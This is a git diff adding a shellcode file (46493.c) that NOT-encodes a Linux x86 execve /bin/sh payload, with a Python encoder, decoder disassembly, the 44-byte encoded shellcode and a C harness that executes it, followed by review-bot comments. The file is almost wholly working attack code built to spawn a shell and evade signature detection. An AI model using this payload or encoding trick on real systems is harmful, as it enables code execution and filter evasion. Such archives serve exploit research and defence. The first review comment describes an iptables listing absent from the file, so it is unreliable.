b/shellcodes/linux_x86/46493.c new file mode 100644 index 000000000..7e3920a8c --- /dev/null +++ b/shellcodes/linux_x86/46493.c 
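Review bot: The nasm listing from `global _start` through `file: db "/sbin/iptables#-F"` and the dashed separator after it sit outside any comment, because each banner line above closes its own `/* ... */`, so the file is not valid C and will not compile as committed (unless the rendering dropped comment delimiters); wrap that listing in one `/* ... */` block as 46492.c and 46493.c do. In `main`, `printf("Shellcode Length: %d\n", strlen(code))` passes a `size_t` to `%d`, which is undefined behaviour and a width mismatch on 64-bit builds, and `main()` itself has no return type; use `int main(void)` and `printf("Shellcode Length: %zu\n", strlen(code));`. The `#include` directives carry no header names as rendered, so `printf`/`strlen` would be implicitly declared; confirm `<stdio.h>` and `<string.h>` are present. Unlike 46492.c, the banner gives no build line, so the fact that the harness depends on an executable data segment (the `-z execstack` flag 46492.c documents) is undocumented here.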
@@ -0,0 +1,99 @@ +/* +; Date: 02/03/2019 +; NOT-Encoder.py +; Author: Daniele Votta +; Description: This program encode shellcode with NOT technique. +; Tested on: i686 GNU/Linux +; Shellcode Length:25 + +#!/usr/bin/python +# Python NOT Encoder + +# Execve /bin/sh +shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") + +encoded = "" +encoded2 = "" + +print 'Encoded shellcode...' + +for x in bytearray(shellcode): + # NOT Encoding + y = ~x + encoded += '\\x' + encoded += '%02x' % (y & 0xff) + + encoded2 += '0x' + encoded2 += '%02x,' % (y & 0xff) + +print encoded +"\n" +print encoded2 +print 'Len: %d' % len(bytearray(shellcode)) +*/ + +#include +#include + +/* + +; NOT-Decoder.asm +; Author: Daniele Votta +; Description: This program decode shellcode with NOT technique. +; Tested on: i686 GNU/Linux +; Shellcode Length:44 +; JMP | CALL | POP | Techniques + +NOT-Decoder: file format elf32-i386 + +Disassembly of section .text: + +08048080 <_start>: + 8048080: eb 0c jmp 804808e + +08048082 : + 8048082: 5e pop esi + 8048083: 31 c9 xor ecx,ecx + 8048085: b1 19 mov cl,0x19 + +08048087 : + 8048087: f6 16 not BYTE PTR [esi] + 8048089: 46 inc esi + 804808a: e2 fb loop 8048087 + 804808c: eb 05 jmp 8048093 + +0804808e : + 804808e: e8 ef ff ff ff call 8048082 + +08048093 : + 8048093: ce into + 8048094: 3f aas + 8048095: af scas eax,DWORD PTR es:[edi] + 8048096: 97 xchg edi,eax + 8048097: d0 d0 rcl al,1 + 8048099: 8c 97 97 d0 9d 96 mov WORD PTR [edi-0x69622f69],ss + 804809f: 91 xchg ecx,eax + 80480a0: 76 1c jbe 80480be <__bss_start+0x12> + 80480a2: af scas eax,DWORD PTR es:[edi] + 80480a3: 76 1d jbe 80480c2 <__bss_start+0x16> + 80480a5: ac lods al,BYTE PTR ds:[esi] + 80480a6: 76 1e jbe 80480c6 <__bss_start+0x1a> + 80480a8: 4f dec edi + 80480a9: f4 hlt + 80480aa: 32 .byte 0x32 + 80480ab: 7f .byte 0x7f +[+] Extract Shellcode ... 
+"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f" + +======================= POC Daniele Votta ======================= +*/ + +/* NOT Encoded Execve /bin/sh */ +unsigned char code[] = \ +"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f"; + +int main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file
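Review bot: `printf("Shellcode Length: %d\n", strlen(code))` in `main` passes a `size_t` to `%d`, which is undefined behaviour and prints the wrong width on 64-bit targets; change it to `printf("Shellcode Length: %zu\n", strlen(code));` or cast to `int` as 46492.c does. The `#include` directives name no header as rendered, so `printf` and `strlen` would be implicitly declared and GCC 14 refuses to build; confirm the committed file has `<stdio.h>` and `<string.h>`. `int (*ret)() = (int(*)())code;` converts an object pointer to a function pointer, which ISO C leaves undefined and GCC accepts only as an extension, and the call additionally requires `code[]` to live in an executable segment; a one-line comment stating both dependencies would save the next reader a debugging session. For what it is worth, the header's `Shellcode Length:44` matches the 44 bytes in `code[]` and the decoder's `mov cl,0x19` matches the 25-byte input, so the documentation is internally consistent.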